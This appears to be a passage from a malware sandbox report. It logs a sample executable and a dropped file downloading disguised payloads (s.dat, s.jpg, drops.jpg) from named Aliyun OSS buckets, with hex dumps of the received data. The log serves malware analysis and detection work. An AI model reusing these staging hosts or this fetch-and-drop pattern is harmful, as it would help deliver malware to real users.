f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50 85 Data Ascii: eE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
2025-01-01 07:30:42 UTC	4096	IN	Data Raw: 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79 a3 Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^\|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
2025-01-01 07:30:42 UTC	4096	IN	Data Raw: 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4 af Data Ascii: e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cgOnx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M>zvGKV?oJy_y@)5f)KBzyt=U%G}}
2025-01-01 07:30:42 UTC	4096	IN	Data Raw: d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7 5f Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z_
2025-01-01 07:30:42 UTC	4096	IN	Data Raw: 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64 96 Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M\|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	39.103.20.97	443	7624	C:\Users\user\Desktop\0000000000000000.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:30:51 UTC	111	OUT	GET /s.dat HTTP/1.1 User-Agent: GetData Host: 3syd1z.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:30:51 UTC	560	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:30:51 GMT Content-Type: application/octet-stream Content-Length: 28272 Connection: close x-oss-request-id: 6774EF2B9F27CB3330F89768 Accept-Ranges: bytes ETag: "A8ACB8CAFB008F7E2CBEA696ECFC8E3B" Last-Modified: Wed, 01 Jan 2025 07:30:48 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 1354589187702952110 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: qKy4yvsAj34svqaW7PyOOw== x-oss-server-time: 12
2025-01-01 07:30:51 UTC	3536	IN	Data Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40 Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
2025-01-01 07:30:51 UTC	4096	IN	Data Raw: 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86 Data Ascii: _##V'3+f~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
2025-01-01 07:30:51 UTC	4096	IN	Data Raw: 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
2025-01-01 07:30:51 UTC	4096	IN	Data Raw: 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41 Data Ascii: 0JY9sEAOyv1\|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4\|4%A}bkkkkEv\|sJ"KKKKD\@NKSA
2025-01-01 07:30:51 UTC	4096	IN	Data Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
2025-01-01 07:30:51 UTC	4096	IN	Data Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c Data Ascii: ,$LDld=5}u]U
2025-01-01 07:30:51 UTC	4096	IN	Data Raw: 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2 Data Ascii: G<EB`."+LVpfVgUo0\|\~:KbkY5xCM$8^330021228SXOBIFe-
2025-01-01 07:30:51 UTC	160	IN	Data Raw: bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 d2 44 c3 74 Data Ascii: VH <dMs~/rSixpGTz& dnCz\|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpSDt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49749	39.103.20.97	443	7624	C:\Users\user\Desktop\0000000000000000.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:30:55 UTC	111	OUT	GET /s.jpg HTTP/1.1 User-Agent: GetData Host: 3syd1z.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:30:56 UTC	543	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:30:56 GMT Content-Type: image/jpeg Content-Length: 8299 Connection: close x-oss-request-id: 6774EF306AD6D5373940F4E6 Accept-Ranges: bytes ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7" Last-Modified: Tue, 31 Dec 2024 10:00:05 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 692387538176721524 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: m9tqSvaBRwuFo9Rq9aTypw== x-oss-server-time: 3
2025-01-01 07:30:56 UTC	3553	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-01 07:30:56 UTC	4096	IN	Data Raw: 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 a5 Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy\|9_;]:^8)'@/Ysq$hQ=2[C
2025-01-01 07:30:56 UTC	650	IN	Data Raw: f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 90 Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK\|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji\|}~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49865	118.178.60.9	443	8184	C:\Users\user\Documents\qWXt7a.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:31:10 UTC	114	OUT	GET /drops.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:31:11 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:31:11 GMT Content-Type: image/jpeg Content-Length: 37274 Connection: close x-oss-request-id: 6774EF3F53726E3631F11C8E Accept-Ranges: bytes ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7" Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9193697774326766004 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: bU3rlSbzlz3g+dzpOS+Opw== x-oss-server-time: 4
2025-01-01 07:31:11 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31 Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
2025-01-01 07:31:11 UTC	4096	IN	Data Raw: b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 cc Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0\|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;\|6@q_^/f
2025-01-01 07:31:11 UTC	4096	IN	Data Raw: d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c d5 Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!\|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h\|
